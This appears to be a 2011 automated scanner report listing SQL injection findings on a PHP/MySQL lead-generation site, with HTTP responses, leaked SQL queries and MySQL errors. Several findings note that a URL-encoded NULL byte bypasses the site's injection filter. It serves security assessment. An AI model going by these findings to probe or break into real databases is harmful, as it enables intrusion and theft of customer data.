The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:32:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=f65sjs7vvev6hoqib811e4voc4; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow'/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow'/cace0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:33:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jniu9okjhrvhi0rouvqoc87ib4; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/cace00'/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00'/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:33:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=g79ble15tas688uiv5psfolah0; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/cace00/project_dynamic_page_updated.php'?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php'?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:28:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mg5ci472e6811aqpktiajvlri5; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/cace00/project_dynamic_page_updated.php?catId=80007.'&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007.'&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:30:43 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8dpb1578hfkifpk1t6fceoqv23; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00.'&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00.'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:28:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=c640mb3pp7db43u6t02qb0v3a3; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00'&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=5120kn3h6994pbsmjqgkoo0c54; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1'=1' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:29:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=l9ln6kgnlp489sj11sr55vl645; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3.'' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3.'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&templa' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:30:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=b5f4rn66vertogg2mno1ffu895; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3'' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&templa' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:52:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j63gma9m7f3up6jf8l7tr103d0; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:53:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=bno3jpsslvb4inhub3tjk6nnj7; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:53:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ghukbgu4r0tle6lefj5rmb0e00; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:53:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=n0ljo87bbqus4k3m90ne6rm596; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5
The attributeId_387 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_387 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8hg5h3foklbltt97biheu5b1f2; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000&attributeId_389=1905__1&attributeId_390=1912__Less than 2 months&attributeId' at line 5
The attributeId_388 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_388 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gmdbi5ei3tlu1r4is865iudal1; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than 2 months&attributeId_391=1919__This is the first time&attributeId_392=1924_' at line 5
The attributeId_389 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_389 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=umns82jml3tvit1bo9pm7o90k6; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than 2 months&attributeId_391=1919__This is the first time&attributeId_392=1924_' at line 5
The attributeId_390 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_390 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rrnuqabjbtq4a1njoq7n4tdfp5; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name' at line 5
The attributeId_391 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_391 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:43 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=f0qmko2k5jhdvhg5i7h0cgmrm7; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time'&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The attributeId_392 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_392 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dqajef1qbnmkfnq3obaa5vice4; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:55:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j6i19e369j71coto5evm6i4g75; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:04:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fh7693vh263mlbjj0sbr39u0e6; path=/ Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009'&iusrc=iups' at line 5
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:55:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dlk6q14e059n7s67lfip22e8s0; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' at line 5
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:56:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=5pk7tt47dh2duqrea590jdvuj1; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' at line 5
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:56:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jq92o6igdlg36iikbqo1eqi0h3; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:05:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=m8pnok0u4vmri3h4lprp25oaj5; path=/ Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc'/' union select prj.catId,p' at line 5
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
